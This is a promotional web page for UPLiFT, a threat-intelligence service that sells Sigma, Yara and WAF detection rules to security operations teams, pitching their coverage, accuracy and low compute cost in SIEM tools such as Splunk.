UPLiFT your SOC Operations team with the latest Threat Actor TTP Rules


Put these rules within your SIEM / WAF / IPS / IDS / EDR to get advanced detection and prevent what Threat Actors are using in the wild. Our Rules are optimized to help take advantage of reduced computation in platforms such as Splunk, Devo, and Elastic Search.


In cybersecurity, a big part of SOC engineering is putting in detections. What detections should I put in place? This problem is challenging if you don't have the threat intelligence of what threat actors are using in the wild. If you know what TTP threat actors are using, your Return on Detection (ROD) becomes very high, as each rule added is not a waste, and you are improving your security posture.

Sigma rule Example

Depicted to the left is a number of features:
- Understandable Description
- FastSearch to reduce computational complexity
- Splitting Image and Commandline for better detections
- Tuning selection clause; and
- Mitre Att&ck Framework references


Get the detections of TTPs that are being used in the wild.
When it comes to detections, the three most important factors are:

1) Coverage - the detections cover attacks that threat actors are using;

2) Accuracy - the accuracy of these detections - if they are not well written or not easily modified. Then the SOC will experience a large number of false positives; and;

3) Computational Complexity - Adding more detections increases the workload of your respective tools. For example, Splunk, as you increase the number of detection alerts, the SOC staff regular searches are queued because there is not enough computing available.

How does LiFT help with this?Coverage
- We focus on what threat actors are doing. Our cognitive understanding within our intelligence collection accurately finds threat actor TTP.

- we have seen many Sigma rules that will never detect the attack for which they are written. Our rule minting process has quality checks to ensure it's written accurately and will match consistently. We have also made the selection criteria easier to change so that tuning these rules is easier and reduces the fragility of Sigma rules.

Computational Complexity
- Most security tools allow a fast search to find specific words located less than other words. Most Sigma rules don't consider this, which means these rules drain the resources of your SOC SIEM/EDR and such platform. We have a fast search as a selection parameter so that each rule tries to find the condition as fast as possible with the least amount of computing needed. These rules are optimized to reduce the compute need in tools like Splunk, DEVO, Elastic Search, and other SIEM tools.This boils down to helping security operations reverse engineer a cyber threat to mitigate future damages. With UPLift's advanced threat intelligence rules, you have all you need to outsmart threat actors. Our threat intelligence system is built with an intelligence-driven intel analysis process. This begins with the discovery, profiling, storage, query, and ranking. We collect data through a machine-learning-based threat hunting system that gathers information directly from feeds, targets and brings the system close to the source of exploit writers. This evens the playground with the bad guys by providing prompt, decluttered information that helps you check if you have been compromised and how to implement new detections based on the studied trends.

Using UPLiFT™ to Mitigate Cyber Threats

Access to threat actor TTPs that threat actors are currently using, places you in a great position to protect your organiztion. You can use our Sigma Rules, Yara Rules, WAF Rules and various IOCs in multiple security tools that you have in your environment.
Knowing Is Half the Battle
get access now